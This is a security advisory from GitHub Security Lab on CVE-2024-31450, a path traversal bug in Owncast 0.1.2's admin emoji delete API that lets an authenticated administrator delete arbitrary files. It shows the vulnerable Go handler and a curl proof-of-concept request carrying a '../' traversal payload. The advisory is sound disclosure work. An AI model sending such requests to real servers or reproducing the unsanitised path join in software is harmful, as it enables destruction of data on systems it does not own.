GHSL-2023-277: Arbitrary File Deletion (AFD) in Owncast - CVE-2024-31450

Coordinated Disclosure Timeline

• 2023-12-27: Sent the report via email.
• 2023-12-28: Received a response acknowledging the team has received the report and feedback. Replied to the maintainer acknowledging the feedback.
• 2024-01-19: Sent an email asking for an update.
• 2024-01-21: Received a response with a fix.
• 2024-02-12: Sent a reminder about creating an advisory and the disclosure deadline.
• 2024-02-13: Received a reply that a new release will be coming soon.
• 2024-04-02: Sent an email informing the GitHub Security Lab will be requesting a CVE for this vulnerability.
• 2024-04-02: Received a reply that a new version will be released within a few days.
• 2024-04-07: New version with a fix is released.
• 2024-04-08: CVE is assigned.

Summary

Owncast in version 0.1.2 allows remote attackers with administrator privileges to delete arbitrary files by making a malicious POST request to /api/admin/emoji/delete.

Product

Owncast

Tested Version

v0.1.2

Details

Arbitrary file deletion in emoji.go (GHSL-2023-277)

The Owncast application exposes an administrator API at the URL /api/admin. The emoji/delete endpoint of said API allows administrators to delete custom emojis, which are saved on disk. As it can be seen in the following snippet, the parameter name is taken from the JSON request and directly appended to the filepath that points to the emoji to delete:

controllers/admin/emoji.go:63

func DeleteCustomEmoji(w http.ResponseWriter, r *http.Request) {
	if !requirePOST(w, r) {
		return
	}

	type deleteEmoji struct {
		Name string `json:"name"`
	}

	emoji := new(deleteEmoji)

	if err := json.NewDecoder(r.Body).Decode(emoji); err != nil {
		// --snip--
	}

	// var emojiFileName = filepath.Base(emoji.Name)
	targetPath := filepath.Join(config.CustomEmojiPath, emoji.Name)

	if err := os.Remove(targetPath); err != nil {
		// --snip--
	}
	// --snip--
}

By using path traversal sequences (../), attackers with administrative privileges can exploit this endpoint to delete arbitrary files on the system, outside of the emoji directory.

Impact

This issue may lead to arbitrary file deletion.

Resources

To exploit this vulnerability, an attacker may make the following POST request:

curl -X 'POST' \
    -H 'Authorization: Basic <ADMIN_CREDENTIALS>' \
    --data '{"name":"../../../../../../../tmp/test"}' \
    'http://(victim_server):8080/api/admin/emoji/delete'

Note that credentials for the admin user are needed.

CVE

• CVE-2024-31450

Credit

This issue was discovered and reported by the GitHub CodeQL team member @atorralba (Tony Torralba). The vulnerability was found with the help of CodeQL’s path injection query.

Contact

You can contact the GHSL team at securitylab@github.com, please include a reference to GHSL-2023-277 in any communication regarding this issue.